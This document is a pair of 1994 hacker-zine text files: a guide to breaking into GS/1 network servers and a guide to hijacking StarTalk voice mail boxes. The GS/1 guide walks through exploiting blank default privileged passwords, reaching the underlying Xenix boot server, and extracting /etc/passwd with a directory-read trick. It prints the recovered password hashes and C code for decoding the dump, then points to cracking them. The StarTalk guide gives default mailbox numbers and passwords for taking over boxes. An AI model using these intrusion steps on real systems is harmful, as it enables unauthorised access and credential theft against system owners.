[<>        El Penga, Hellpop, and other certified DLI and CNC members.  <>]
[<>                                                                     <>]
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]

                               Index
              ========================================

              1. Finding and identifying a GS/1
              2. Getting help
              3. Gaining top privilege access
              4. Finding the boot server
              5. Connecting to the boot server
              6. Getting the boot server password file
              7. Other avenues


----------------------------------------------------------------------------


Here's hacking a GS/1 made EZ (for the sophisticated hacker)  It is
advisable to fill your stein with Sysco and pay close attention... if
Sysco is not available in your area, Hacker Pschorr beer will work
almost as good... (especially Oktoberfest variety)


What is a GS/1?
---------------
A GS/1 allows a user to connect to various other computers... in other
words, it's a server, like a DEC or Xyplex.


So why hack it?
---------------
Cuz itz there... and plus you kan access all sortz of net stuph fer
phree. (QSD @ 208057040540 is lame and if you connect to it, you're
wasting the GS/1.. the French fone police will fly over to your country
and hunt you down like a wild pack of dogs, then hang you by your own
twisted pair.)


What to do:
-----------



               +--------------------------------------+
               +  #1. Finding and identifying a GS/1  +
               +--------------------------------------+

Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
GS/1, though the prompt can be set to whatever you want it to be.  A
few years ago there were quite a number of GS/1's laying around on
Tymnet and Telenet... you can still find a few if you scan the right
DNIC's.  (If you don't know what the hell I'm talking about, look at
some old Phracks and LOD tech. journals.)

The prompt will look similar to this:

(!2) GS/1>

(The (!2) refers to the port you are on)



                        +--------------------+
                        +  #2. Getting help  +
                        +--------------------+

First try typing a '?' to display help items.

A help listing looks like this:

> (!2) GS/1>?
>       Connect     <address>[,<address>] [ ECM ] [ Q ]
>       DO          <macro-name>
>       Echo        <string>
>       Listen
>       Pause       [<seconds>]
>       PIng        <address> [ timeout ]
>       SET         <param-name> = <value> ...
>       SHow        <argument> ...

At higher privileges such as global (mentioned next) the help will
look like this (note the difference in the GS/1 prompt with a # sign):

> (!2) GS/1# ?
>       BRoadcast   ( <address> ) <string>
>       Connect     ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
>       DEFine      <macro-name> = ( <text> )
>       DisConnect  ( <address> ) [<session number>]
>       DO          ( <address> ) <macro-name>
>       Echo        <string>
>       Listen      ( <address> )
>       Pause       [<seconds>]
>       PIng        <address> [ timeout ]
>       ReaD        ( <address> ) <option> <parameter>
>       REMOTE      <address>
>       ROtary      ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ...
>       SAve        ( <address> ) <option> <filename>
>       SET         ( <address> ) <param-name> = <value> ...
>       SETDefault  ( <address> ) [<param-name> = <value>] ...
>       SHow        ( <address> ) <argument> ...
>       UNDefine    ( <address> ) <macro-name>
>       UNSave      ( <address> ) <filename>
>       ZeroMacros  ( <address> )
>       ZeroStats   ( <address> )

Additional commands under global privilege are: BRoadcast, DEFine,
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
ZeroStats, and a few extra options under the normal user commands.

If you need in-depth help for any of the commands, you can again use the
'?' in the following fashion:

> (!2) GS/1>sho ?
>       SHow    ADDRess
>       SHow    ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
>       SHow    DefaultParameters [<param-name> ...]
>       SHow    GLobalPARameters
>       SHow    NetMAP [ Short | Long ]
>       SHow    PARAmeterS [<param-name> ...]
>       SHow    <param-name> ...
>       SHow    SESsions [ P ]
>       SHow    VERSion

> (!2) GS/1>sh add?
>       SHow    ADDRess

> (!2) GS/1>sh add
> ADDRess = &000023B5%07000201E1D7!2

"sh add" displays your own network, address and port number.

The network is 000023B5
The address is 07000201E1D7
The port number is 2



                   +------------------------------------+
                   +  #3. Gaining top privilege access  +
                   +------------------------------------+

Figure out the global password.

Do a "set priv=global" command.

   Note:
   ----
   There are 3 states to set priv to: user, local, and global.  Global is
   the state with the most privilege.  When you attain global privilege,
   your prompt will change to have a '#' sign at the end of it.. this means
   you have top priceless (similar to *nix's super user prompt).

The GS/1 will prompt you for a password.  The default password on GS/1's
is to have no password at all... The GS/1  will still prompt you for a
password, but you can enter anything at this point if the password was
never set.



                  +-------------------------------+
                  +  #4. Finding the boot server  +
                  +-------------------------------+

Figure out the boot server address available from this GS/1 ..

The boot server is what lies under the GS/1.  We've found that GS/1's are
actually run on a Xenix operating system.. (which is of course a nice
phamiliar territory)  It's debatable whether all GS/1's are run on Xenix or
not as we have yet to contact the company.  (We may put out a 2nd file going
into more detail.)

Do a "sh b" or "sh global" as shown in the following examples:

> (!2) GS/1# sh b
> BAud = 9600         BootServerAddress = &00000000%070002017781
> BReakAction = ( FlushVC, InBand )       BReakChar = Disabled
> BSDelay = None      BUffersize = 82

> (!2) GS/1# sh global
> ...............................Global Parameters............................
> DATE = Wed Jun 22 21:16:45 1994         TimeZone = 480 minutes
> DaylightSavingsTime = 0 minutes         LogoffStr = "L8r laM3r"
> WelcomeString = "Welcome to your haqued server (!2), Connected to "
> DOmain = "thelabz"                      Organization = "delam0"
> PROmpt = "GS/1>"                        NMPrompt = "GS/1# "
> LocalPassWord = ""                      GlobalPassWord = "haque-me"
> NetMapBroadcast = ON                    MacType = EtherNET
> CONNectAudit = ON                       ERRorAudit = ON
> AUditServerAddress = &000031A4%07000200A3D4
> AUditTrailType = Local
> BootServerAddress = &00000000%070002017781

Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
... these are the actual passwords that need to be entered (or in the case
of the LocalPassWord, "" matches any string).  You'll only be able to
"sh global" after a successful "set priv=global".

Now that you have the boot server address, the next step is enabling
communication to the boot server.



              +-------------------------------------+
              +  #5. Connecting to the boot server  +
              +-------------------------------------+

Do a REMOTE <address> where address is the address of the machine you
want to issue remote commands to.

> (!2) GS/1# REMOTE %070002017781
> (!2) Remote: ?
>       BInd        <address> [-f <bootfile>] [-l <loader>] [<nports>]
>       BRoadcast   ( <address> ) "<string>"
>       CoPyfile    [<address>:]<pathname> [<address>:][<pathname>]
>       LiSt        [ -ls1CR ] [<pathname> ...]
>       MoVe        <pathname> <pathname>
>       NAme        <clearinghouse name> = <address>[,<address>]...
>       Ping        <address> [timeout]
>       ReMove      <pathname> ...
>       SET         [( <address> )] <param-name> = <value> ...
>       SETDefault  <param-name> = <value> ...
>       SHow        <argument>
>       UNBind      <address>
>       UNDefine    <macro name>
>       UNName      <name>
>       ZeroStats
>       <BREAK>     (to leave remote mode)

Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
you will be issuing commands to whatever remote machine you specified
by the REMOTE <address> command.

Notice for this case, the boot server's address was used.

When you get the REMOTE: prompt, you can issue commands that will be
executed on the remote machine.  Try doing a '?' to see if it's another
GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.

Also notice that the help commands on the remote are not the same as
those for the GS/1 (though, if you establish a remote link with another
GS/1 they will be the same).

> (!2) Remote: ls -l
> total 1174
> drwxrwxrwx   2 ncs      ncs          160 Aug 17  1989 AC
> drwxrwxrwx   2 ncs      ncs         5920 Jun  5 00:00 AUDIT_TRAIL
> drwxrwxrwx   2 ncs      ncs           96 Jun  5 01:00 BACKUP
> drwxrwxrwx   2 ncs      ncs          240 Jun  4 04:42 BIN
> drwxrwxrwx   2 ncs      ncs          192 Jun  4 04:13 CONFIGS
> drwxrwxrwx   2 ncs      ncs           64 Aug 17  1989 DUMP
> drwxrwxrwx   2 ncs      ncs           80 Aug 17  1989 ETC
> drwxrwxrwx   2 ncs      ncs          160 Jun  4 04:13 GLOBALS
> -rw-r--r--   1 ncs      ncs          228 Jun  5 00:59 btdata
> -rw-r--r--   1 ncs      ncs         8192 Jun  8  1993 chnames.dir
> -rw-r--r--   1 ncs      ncs        11264 Jun  1 13:41 chnames.pag
> drwxrwxrwx   2 ncs      ncs           48 Jun  5 00:00 dev
> drwx------   2 bin      bin         1024 Aug 17  1989 lost+found
> -rw-rw-rw-   1 ncs      ncs       557056 Mar 23  1992 macros
> -rw-r--r--   1 ncs      ncs          512 Oct 22  1993 passwd

Look familiar??  If not, go to the nearest convenient store and buy the
a 12 pack of the cheapest beer you can find.. leave your computer
connected so you hurry back, and slam eight or nine cold onez... then
look at the screen again.

You're basically doing a Remote Procedure Call for ls to your Xenix boot
server.

Notice at this point that the "passwd" is not owned by root.  This is
because this is not the system password file, and you are not in the
"/etc" directory... (yet)

There are a couple of problems:

> (!2) Remote: cat
> Invalid REMOTE command
>
> (!2) Remote: cd /etc
> Invalid REMOTE command

You cannot view files and you cannot change directories.

To solve the "cd" problem do the following:

> (!2) Remote: ls -l ..
> total 26
> drwxrwxrwx  12 root     root         352 Jun  5 00:59 NCS
> drwxr-xr-x   2 bin      bin          112 Aug 17  1989 adm
> drwxrwx---   2 sysinfo  sysinfo       48 Aug 17  1989 backup
> drwxr-xr-x   2 bin      bin         1552 Aug 17  1989 bin
> drwxr-xr-x  20 bin      bin          720 Aug 17  1989 lib
> drwxrwxrwx   6 ncs      ncs          224 Aug 17  1989 ncs
> drwxr-xr-x   2 bin      bin           32 Aug 17  1989 preserve
> drwxr-xr-x   2 bin      bin           64 Aug 17  1989 pub
> drwxr-xr-x   7 bin      bin          144 Aug 17  1989 spool
> drwxr-xr-x   9 bin      bin          144 Aug 17  1989 sys
> drwxr-x---   2 root     root          48 Aug 17  1989 sysadm
> drwxrwxrwx   2 bin      bin           48 Jun  5 01:00 tmp
>
> (!2) Remote: ls -l ../..
> total 1402
> -rw-r--r--   1 root     root        1605 Aug 17  1989 .login
> -r--r--r--   1 ncs      ncs         1605 Aug 28  1990 .login.ncs
> -rw-r--r--   1 root     root         653 Aug 17  1989 .logout
> -r--r--r--   1 ncs      ncs          653 Aug 28  1990 .logout.ncs
> -rw-------   1 root     root         427 Aug 17  1989 .profile
> drwxr-xr-x   2 bin      bin         2048 Aug 17  1989 bin
> -r--------   1 bin      bin        25526 May  4  1989 boot
> drwxr-xr-x   6 bin      bin         3776 Aug 17  1989 dev
> -r--------   1 bin      bin          577 Nov  3  1987 dos
> drwxr-xr-x   5 bin      bin         1904 Jun  2 12:40 etc
> drwxr-xr-x   2 bin      bin           64 Aug 17  1989 lib
> drwx------   2 bin      bin         1024 Aug 17  1989 lost+found
> drwxr-xr-x   2 bin      bin           32 Aug 17  1989 mnt
> drwxrwxrwx   2 bin      bin          512 Jun  5 01:20 tmp
> drwxr-xr-x  14 bin      bin          224 Aug 17  1989 usr
> -rw-r--r--   1 bin      bin       373107 Aug 17  1989 xenix
> -rw-r--r--   1 root     root      287702 Aug 17  1989 xenix.old

Your brain should now experience deja vous.. you just found the
root directory.  (for the non-*nix, lam0-hacker, the root directory
has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)

Now you can get to /etc/passwd as follows:

> (!2) Remote: ls -l ../../etc
> total 1954
> -rwx--x--x   1 bin      bin         7110 May  8  1989 accton
> -rwx------   1 bin      bin         1943 May  8  1989 asktime
> -rwx------   1 bin      bin        31756 May  8  1989 badtrk
> -rw-rw-rw-   1 root     root        1200 Apr 24 12:40 bootlog
> -rwx--x--x   1 bin      bin        24726 May  8  1989 brand
> -rw-r--r--   1 bin      bin           17 Aug 17  1989 checklist
> -rw-r--r--   2 bin      bin           17 Aug 17  1989 checklist.last
> -rw-r--r--   1 ncs      ncs           17 Aug 28  1990 checklist.ncs
> -rw-r--r--   2 bin      bin           17 Aug 17  1989 checklist.orig
> -rwx------   1 bin      bin         2857 May  8  1989 chsh
> -rwx------   1 bin      bin         7550 May  8  1989 clri
> -rwx------   1 bin      bin         8034 May  8  1989 cmos
> -rwxr-xr-x   1 root     bin        31090 Aug 28  1990 cron
> -rw-r--r--   1 bin      bin          369 May  8  1989 cshrc
> ...... etc.
> -rw-r--r--   1 root     root         465 Mar  5  1991 passwd

Yeah, now what?!

You've found the /etc/passwd file, but you don't have "cat" to type the
file out.  Now you're stuck... so drink a half a bottle of Sysco per
person. (We did... and as you'll see, Sysco is the drink of a manly hackers
like us... make sure it's the big bottle kind not those girly small
onez.)



            +---------------------------------------------+
            +  #6. Getting the boot server password file  +
            +---------------------------------------------+

There is one way to get around the cat problem (no itz n0t puttin
catnip laced with somethin U made frum a phile on yer doorstep)
It's done using ls.  On this Xenix system, the directory structure is
the old Unix format: A 16 byte record comprised of a 2 byte I-number
and a 14 byte character field.

   Note about directory structure for the inquisitive hacker:
   In a directory record there is a 14 byte string containing the file
   name, and the 2 byte I-number (2 bytes = an integer in this case)
   which is a number that is an (I)ndex pointer to the I-node.  The
   I-node then contains the information about where the file's data is
   actually kept (similar to how a FAT table works on an IBM PC yet a
   different concept as it has indirect index blocks etc. I won't get
   into) and what permissions are set for the file.  Be warned that in
   newer *nix implementations, file names can be more than 14 characters
   and the directory structure will be a bit different than discussed.

The "ls" command has an option that allows you to tell it "this *file* is
a *directory*.. so show me what's in the directory"... newer *nix
systems won't like this (the -f option) because of the new directory
structure.

> (!2) Remote: ls -?
> ls: illegal option --?
> usage:  -1ACFRabcdfgilmnopqrstux [files]
>
> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
> 28530 ot:BJlx/e8APHe   30580 :0:0:Super use   14962 /:/bin/csh?sys
> 25697 m:X/haSqFDwHz1   14929 0:0:System Adm   28265 istration:/usr
> 29487 ysadm:/bin/sh?   29283 on:NOLOGIN:1:1   17210 ron daemon for
> 28704 eriodic tasks:   14895 ?bin:NOLOGIN:3   13114 :System file a
> 28004 inistration:/:   29962 ucp::4:4:Uucp    25697 ministration:/
> 29557 r/spool/uucppu   27746 ic:/usr/lib/uu   28771 /uucico?asg:NO
> 20300 GIN:6:6:Assign   25185 le device admi   26990 stration:/:?sy
> 26995 nfo:NOLOGIN:10   12602 0:Access to sy   29811 em information
> 12090 :?network:NOLO   18759 N:12:12:Mail a   25710  Network admin
> 29545 tration:/usr/s   28528 ol/micnet:?lp:   20302 LOGIN:14:3:Pri
> 29806  spooler admin   29545 tration:/usr/s   28528 ol/lp:?dos:NOL
> 18255 IN:16:10:Acces    8307 to Dos devices   12090 :?ncs:yYNFnHnL
> 22327 xcU:100:100:NC    8275 operator:/usr/
>
> (!2) Remote: <BRK>
> (!2) GS/1#

Wow, kewl.  Now that you have a bunch-o-shit on your screen, you have
to make some sense out of it.

The password file is almost legible, but the I-numbers still need to be
converted to ASCII characters.  This can be accomplished in a variety of
ways... the easiest is to write a program like the following in C:

On a PC the following code should work:

#include <stdio.h>
main()
{
   union {
      int i;
      char c[2];
   } x;
   while (1) {
      printf("Enter I-Number: ");
      scanf("%d", &x.i);
      printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
   }
}

On a *nix based system the following code will work (depending on
word size and byte arrangement):

#include <stdio.h>
main()
{
   union {
      short int i;
      char c[2];
   } x;
   while (1) {
      printf("Enter I-Number: ");
      scanf("%hd", &x.i);
      printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
   }
}


When you have translated the I-numbers you can substitute the ASCII
values by hand (or write a d0p3 program to do it for you):

28530 ot:BJlx/e8APHe   30580 :0:0:Super use   14962 /:/bin/csh?sys
28530 = [r][o]         30580 = [t][w]         14962 = [r][:]
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys

25697 m:X/haSqFDwHz1   14929 0:0:System Adm   28265 istration:/usr
25697 = [a][d]         14929 = [Q][:]         28265 = [i][n]
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr

29487 ysadm:/bin/sh?   29283 on:NOLOGIN:1:1   17210 ron daemon for
29487 = [/][s]         29283 = [c][r]         17210 = [:][C]
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for

28704 eriodic tasks:   14895 ?bin:NOLOGIN:3   13114 :System file a
28704 = [ ][p]         14895 = [/][:]         13114 = [:][3]
 periodic tasks:/:?bin:NOLOGIN:3:3:System file a

28004 inistration:/:   29962 ucp::4:4:Uucp    25697 ministration:/
28004 = [d][m]         29962 = [^M][u]        25697 = [a][d]
dministration:/:
uucp::4:4:Uucp administration:/

29557 r/spool/uucppu   27746 ic:/usr/lib/uu   28771 /uucico?asg:NO
29557 = [u][s]         27746 = [b][l]         28771 = [c][p]
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO

20300 GIN:6:6:Assign   25185 le device admi   26990 stration:/:?sy
20300 = [L][O]         25185 = [a][b]         26990 = [n][i]
LOGIN:6:6:Assignable device administration:/:?sy

26995 nfo:NOLOGIN:10   12602 0:Access to sy   29811 em information
26995 = [s][i]         12602 = [:][1]         29811 = [s][t]
sinfo:NOLOGIN:10:10:Access to system information

12090 :?network:NOLO   18759 N:12:12:Mail a   25710  Network admin
12090 = [:][/]         18759 = [G][I]         25710 = [n][d]
:/:?network:NOLOGIN:12:12:Mail and Network admin

29545 tration:/usr/s   28528 ol/micnet:?lp:   20302 LOGIN:14:3:Pri
29545 = [i][s]         28528 = [p][o]         20302 = [N][O]
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri

29806  spooler admin   29545 tration:/usr/s   28528 ol/lp:?dos:NOL
29806 = [n][t]         29545 = [i][s]         28528 = [p][o]
nt spooler administration:/usr/spool/lp:?dos:NOL

18255 IN:16:10:Acces    8307 to Dos devices   12090 :?ncs:yYNFmHnL
18255 = [O][G]          8307 = [s][ ]         12090 = [:][/]
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL

22327 xcU:100:100:NC    8275 operator:/usr/
22327 = [7][W]          8275 = [S][ ]
7WxcU:100:100:NCS operator:/usr


The resulting file will look like the following:

root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
 periodic tasks:/:?bin:NOLOGIN:3:3:System file a
dministration:/:
uucp::4:4:Uucp administration:/
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
LOGIN:6:6:Assignable device administration:/:?sy
sinfo:NOLOGIN:10:10:Access to system information
:/:?network:NOLOGIN:12:12:Mail and Network admin
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
nt spooler administration:/usr/spool/lp:?dos:NOL
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
7WxcU:100:100:NCS operator:/usr

Because the ls command cannot display "non-printable" characters such
as the carriage return, it will replace them with a '?' character...
delete the '?' characters and divide by line at these locations.  When
you finish doing that, you'll have a standard /etc/passwd file:

root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
bin:NOLOGIN:3:3:System file administration:/:
uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
asg:NOLOGIN:6:6:Assignable device administration:/:
sysinfo:NOLOGIN:10:10:Access to system information:/:
network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
dos:NOLOGIN:16:10:Access to Dos devices:/:
ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr

Once you've assembled your password file in a standard ASCII form,
you'll of course want to crack it with one of the many available DES
cracking programs.

+---------------------+
+  #7: Other Avenues  +
+---------------------+

Find out what else you can play with by first finding what networks are
available other than your own, and second, find out what machines are on
your network:

>(!2) GS/1# sh att
>                               Attached Networks
>&000023B5
>(!2) GS/1# sh nmap l
>                             NETWORK &000023B5 MAP
>
>  1-%070002017781 SW/AT-NCS       3.0.2  2-%070002A049C5 SW/NB-BR-3.1.1.1
>  3-%0700020269A7 SW/200-A/BSC/SDL22000  4-%07000201C089 SW/200-A/BSC/SDL22020
>  5-%070002023644 SW/200-A/BSC/SDL22020  6-%0700020138B2 SW/AT-NCS       2.1.1
>  7-%070002010855 SW/100-A/BSC    20060  8-%070002018BA2 SW/20-XNS-X.25  .0.2
> .... etc.

The boot server address, from previous examples, is number 1
which contains a description "SW/AT-NCS".  Examining the rest of the
list, number 6 has the same description.  System 12 may be just another
address for the boot server or it may be a different Xenix... but it should
be Xenix whatever it is.

We have refrained from covering the typical GS/1 information that has been
published by others; and instead, covered newer concepts in GS/1 hacking.
This phile is not a complete guide to GS/1 hacking; but expect successive
publications on the topic.





 


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 18 of 26

****************************************************************************

      ***** ********  ****     *****  ********  ****    **     **   **
     *****    ****   **  **   **   **   ****   **  **   **     ** ***
       ****   ****  ** ** **  ** **     ****  ** ** **  **     *****
     *****    **** **      ** **  ***   **** **      ** ****** **  ***

             (*)  A Complete 'N Easy Guide to Hacking and the (*)
                (*) Usage of "StarTalk" Voice Mail Systems (*)

                           Written By: The Red Skull
                                   07/25/94

                                 Introduction
                                 ~~~~~~~~~~~~
      There are many types of different voice mail systems out there, that
run on phone systems they are compatible with.  You have probably seen a lot
of text files about hacking voice mail systems, on your local bulletin
boards.  The popular ones you might have heard about are systems like, Aspen
(Automatic Speech Exchange Network), TMC (The Message Center), Audix, and
Meridian Mail.  There are VMB hacking programs that are suppose to hack vmbs
for you.  I really don't believe in those kind of programs.  When I say this,
I am not talking about programs like Tone Locator or Blue Beep, I am talking
about programs like 'The Aspen Hacker' and any other *VMB* hacking programs.
I am just saying this, so you don't mix this guide up with a vmb hacking
program.

                             General Information
                             ~~~~~~~~~~~~~~~~~~~
     I have decided to write a hacking/user's guide for the StarTalk Voice
Mail System because there is no guide for the StarTalk Voice Mail System,
and almost no one has heard about it.  Since this will be the first one for
it, I will try and explain it as simply as possible.  You might have heard
of Northern Telecom.  They are the makers of StarTalk, but they are also the
makers of a very popular user-friendly Voice Mail System called 'Meridian
Mail'.  Both StarTalk and Meridian Mail run on the Norstar telephone system.
StarTalk is designed to function as an extension of the Norstar telephone
system.  All the StarTalk software operation is done on a Norstar telephone
set, so that means it doesn't run on a computer terminal.  There are 3
different sizes and configurations that the StarTalk Voice Mail System
comes with -

 o Model 110 - 2 voice channels, with 1 hour and 50
               minutes total storage.

 o Model 165 - 4 voice channels, with 2 hours and 45
               minutes total storage.

 o Model 385 - 4 voice channels, with 6 hours and 25
               minutes total storage.
               The capabilities of StarTalk Model 385
               can be further expanded through an
               enhancement option, available in 4, 6
               or 8 channel versions, which provides
               a total of 9 hours an 45 minutes of
               storage.

     Right now, you might be wondering what the hell i'm talking about, but
it's simple.  The number of voice channels means how many voice mail users
could be using their voice mail.  So for example, 4 voice channels, means only
4 voice mail users could be on the voice mail system.  The Model 110 can hold
about 25 boxes, the Model 165 can hold 50 boxes and the Model 385 can hold 120
boxes and higher.  So, it's better if you find a StarTalk Voice Mail System
that is running Model 385.  The part that says 'with 6 hours and 25 minutes
total storage', means how many hours of messages it can store.  The Model 385
is also upgradable.  I could go on about the models but that's all we need to
know for now.  So now that we've finished this, we will get into the part
that you've been waiting for.

                     Finding a StarTalk Voice Mail System
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     You will probably not be able to recognize a StarTalk voice mail system
if you find one using a war dialer, because when a StarTalk system answers,
it will only have the company's personalized automated greeting.  There are
only two ways to get a StarTalk system:  you either scan it out yourself or
get it from someone else.  If you get it from someone else, all the boxes
will probably be gone, used or just not safe.

                   Recognizing a StarTalk Voice Mail System
                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     Ok, now let's say you have come across a StarTalk system, how do you
know that it's a StarTalk?  As I said, you will not be able to tell if it's a
StarTalk system by just calling it.  If the system is a Startalk, when the
company's personalized greeting answers, press '*' and it should say -

"Please enter the mailbox number, or press the # sign to use the directory"

Remember, if you press '*' and just sit there, it will repeat the message
one more `time, and then say "Exiting the system."

If you hit '**' it should say -

"Please enter your mailbox number and your password, then press # sign"

If you don't get anything like this, that means it's not a StarTalk Voice
Mail System.  If you are still not sure that you have a StarTalk System,
then you can always call 416-777-2020 and listen to the voice and see
if it matches with what you have found.

                           Finding a Virgin Box
                           ~~~~~~~~~~~~~~~~~~~~
     This is a very interesting step and also an easy one.  Once you have
found a StarTalk Voice Mail System, the first thing you'll want to do is
get some boxes on it.  The interesting part is that you are always guaranteed
to get one box on a StarTalk System.  This is because every StarTalk System
has a box that is for the voice mail users to leave any problems they are
experiencing with their vmb.  This is the box that almost always has a default
on it, but if the System Admin is smart he will change it.  So far, on all the
StarTalk systems that I have come across the default for this box hasn't been
changed.  The box number is '101' and the defaults for StarTalk Voice Mail
systems are '0000'.  So the first thing you should do is call up the system
and press *101 and the default greeting on the box should say (this greeting
is for box 101 only) -

"This is the Trouble-Report mailbox, if you are experiencing difficulty
 using the messaging features, please leave your name, mailbox # and a
 detailed description of the problem" *BEEP*

If it says that, press '**' and then when it asks you to enter your mailbox
number and your password, enter '1010000' and press the # sign.  If you've
followed everything I've said and the System Admin hasn't changed the
default on this box, it should go ahead and ask you to enter your new
personal mailbox password.  There is another box number which is sometimes
at the default which is the System Admin's box at 102.  Although this is a
System Admin box, the only System Admin option it has available is to leave
a broadcast message, which leaves a message to all boxes on the system.
This box will have the regular default greeting which is -

"This mailbox is not initialized and cannot accept messages, please
 try again later"

Do the same thing you did before, If it says that, press '**' and then when
it asks you to enter your mailbox number and your password, enter '1020000'
and press the # sign.  If everything is fine, it should ask you to enter your
new personal mailbox password.  This is called Initializing your mailbox, and
I'll talk about this later in this file.  So, there you go, you've got your
box on a StarTalk System.  All StarTalk Voice Mail Systems that I have run
into so far have had 2-3 digit mailboxes.  Now, to hack any other boxes
through the system, you would have to go and keep on trying 3 digit mailbox
number starting with 1XX, until you find an empty box with a regular default
greeting.  Let's say you find another empty box at box number 130, you will do
the same thing, press '**' and when it asks you to enter your mailbox number
and your password, enter '1300000' and press the # sign.  One thing I like
about box number '101' is that, a lot of System Admin's are not aware that it
even exists, that is because they probably have a lousy TSR (Technical Service
Rep).  (This is the person that is suppose to help them install the Voice
Mail System.)

            What to do After you've Got A StarTalk Voice Mail Box
            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The rest of the file will concentrate on all the inside functions and
options that a StarTalk Voice Mail Box has.  We will be covering all
these topics -

 o Initializing a Mailbox
 o Your Mailbox Greeting
 o Recording a Greeting
 o Choosing a Mailbox Greeting
 o Listening To Messages
 o Off-premise Message Notification
 o Setting Up Off-premise Message Notification
 o Disabling Off-premise Message Notification
 o Changing Off-premise Message Notification
 o Leaving a Mailbox Message
 o Message Delivery Options
 o Assigning the Target Attendant
 o Quick Reference Tips

                                 Your Mailbox
                                 ~~~~~~~~~~~~
     Before you can use your mailbox, you must:

     - open your mailbox
     - change your password
     - record your name
     - record your personal mailbox greeting(s)

This is called Initializing your mailbox.

Initializing a Mailbox
----------------------
To open and initialize your mailbox:

1. Press * * and Mailbox #
2. Enter the default password '0000'
3. To end the password, press #
4. The StarTalk voice prompt, asks you to enter your new personal mailbox
   password.
5. Using touchtones, enter your new mailbox password.  Your password can
   be from 4 to 8 digits long, but it cannot start with zero.
6. To end your password, press #
7. After you have accepted your password, you are asked to record your name
   in the Company Directory, At the tone, record your name.
8. To end your recording, press #
9. To accept your recording, press #

You are now ready to record your personal mailbox greetings.  Once your
greetings are recorded, you have the option of selecting either your primary
or alternate greeting.  If you do not select a greeting, your primary
greeting plays automatically.

Note: Initializing a mailbox is only done the first time you open your
mailbox.  You have to initialize your mailbox to receive messages.

                            Your Mailbox Greeting
                            ~~~~~~~~~~~~~~~~~~~~~
      Each mailbox has a primary and alternate greeting recorded by you.
After you have recorded your personal mailbox greetings, you can choose
which greeting you play to callers reaching your mailbox.

Recording a Greeting
--------------------
To record your greetings, you must first open your mailbox.  Once you have
opened your mailbox:

1. Press 8
2. To select Greeting Options, press 2
3. To record your greeting, press 1
4. Select which greeting you are going to record.
   Note: You can choose to record either your primary or alternate mailbox
   greeting.
5. To record your greeting, press 1
6. At the tone, record your greeting.
7. To end your greeting, press #
8. To accept this recording, press #

Choosing a Mailbox Greeting
---------------------------
After the mailbox greeting is recorded, you can choose which greeting you
are going to use.  If you do not choose a mailbox greeting, Startalk
automatically plays your primary greeting.  To choose a mailbox greeting
you must open your mailbox. Once you have opened your mailbox:

1. Press 8
2. To select Greeting Options, press 2
3. Press 2
4. Select which mailbox greeting your mailbox is going to use.

Listening To Messages
---------------------
Each time you open your mailbox, StarTalk plays any Broadcast messages left
by the System Admin (don't reply to them!), and also tells you how many other
messages are in your mailbox.  Messages are played beginning with any Urgent
messages, followed by the first message left in your mailbox.

To listen to messages, you must open your mailbox.  Once you have opened
your mailbox:

1.  To listen to messages, press 2 or to listen to your saved messages,
    press 6

Your first message starts to play.  While listening to a message, or after
a message has played, you can:

Replay the message          : 1 1
Back up 9 seconds           : 1
Pause and Continue          : 2 to pause then 2 to continue
Forward 9 seconds           : 3
Skip to the end of message  : 3 3
Play the previous message   : 4
Forward the message         : 5
Skip to the next message    : 6
Play time and date stamp    : 7
Save a Message              : 7 7
Erase the message           : 8
Reply to the message        : 9
Volume control              : *

Note: After listening to the messages left in your mailbox and exiting
      StarTalk, all messages you do not erase are automatically saved.


Off-premise Message Notification
--------------------------------
Off-premise Message Notification, to a telephone number or a pager, alerts
you when messages are left in your mailbox.  Off-premise Message Notification
is enabled in the StarTalk Class of Service designation by the System
Coordinator.

Setting Up Off-premise Message Notification
-------------------------------------------
To set up Off-premise Message Notification, you must first open your
mailbox.  Once you have opened your mailbox:

1.  Open the mailbox admin menu, press 8
2.  Open the message notification menu, press 6
3.  To set up message notification, press 1
4.  To select a line, press 1
    Note:  You can also select line, pool or intercom.
    (YOU HAVE TO SELECT LINE)
5.  Enter a line, pool or IC number, press #
    Note:  You have to enter '1', or '01' as the line if 1 doesn't work.
6.  To accept the line, pool or IC number, press #
7.  Enter the destination telephone number, press #
